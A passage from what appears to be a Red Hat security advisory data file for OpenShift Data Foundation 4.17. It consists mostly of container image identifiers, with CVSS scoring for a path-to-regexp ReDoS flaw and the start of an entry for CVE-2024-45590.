"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", 